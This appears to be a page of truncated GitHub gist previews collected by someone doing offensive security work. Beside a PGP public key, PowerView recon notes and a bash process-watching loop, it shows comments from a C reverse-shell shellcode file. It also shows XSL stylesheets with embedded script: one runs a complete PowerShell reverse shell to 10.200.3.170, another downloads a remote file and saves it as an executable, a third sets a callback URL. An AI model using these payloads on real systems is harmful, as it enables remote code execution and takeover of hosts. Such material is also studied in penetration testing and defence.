This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-----BEGIN PGP PUBLIC KEY BLOCK----- | |
Version: FlowCrypt Email Encryption - flowcrypt.com | |
Comment: Seamlessly send, receive and search encrypted email | |
xsFNBFyY868BEACqHhE2O0vEoFiLlmY2F20vf3lmheSESHENhE6QJFGmg4w5 | |
i+PwORdcYXH+2LSvu8+XFrF9HGMyYgP3e9hruJHqVolyTGNavRcwKUiIE9Qz | |
ZPEw9rZTHa3T3uupJJeQEWba5SFmbh5av9sZEqwPC2aiZX9Y4a0LBKHJA2rh | |
/+roJlpLrI2jAqDEJ0j1EfqXiGMcPiAfkiZp1KvKcPrElrIpP0ysnevKbdCO | |
Jkt/7W0cl1GxWcCqOyxjJwjJwj9JmsXgIUNMB//Cv1YYWkDmhfI8MQak8til | |
LGbNHnvWCIX74168kE57/J1rUCogHrrGzIqdH4TkuquN1FNIwkT+Cr1OfxH2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Loop by line | |
IFS=$'\n' | |
old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) | |
while true; do | |
new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) | |
diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */ | |
// | |
// gcc reverse_shell.c -fno-stack-protector -Os -z execstack -no-pie -o shellcode | |
// for i in `objdump -d ./shellcode | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done ; echo | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <netinet/in.h> | |
#include <sys/types.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command \"$client = New-Object System.Net.Sockets.TCPClient('10.200.3.170',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",0,true); | |
]]> </ms:script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version='1.0'?> | |
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="VB"> | |
<![CDATA[ | |
strFileURL = "http://10.200.3.164/server.py" | |
strHDLocation = "mess.exe" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, false |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version='1.0'?> | |
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="VBScript"> | |
<![CDATA[ | |
Option Explicit | |
On Error Resume Next | |
CONST callbackUrl = "http://10.200.3.164:80/" |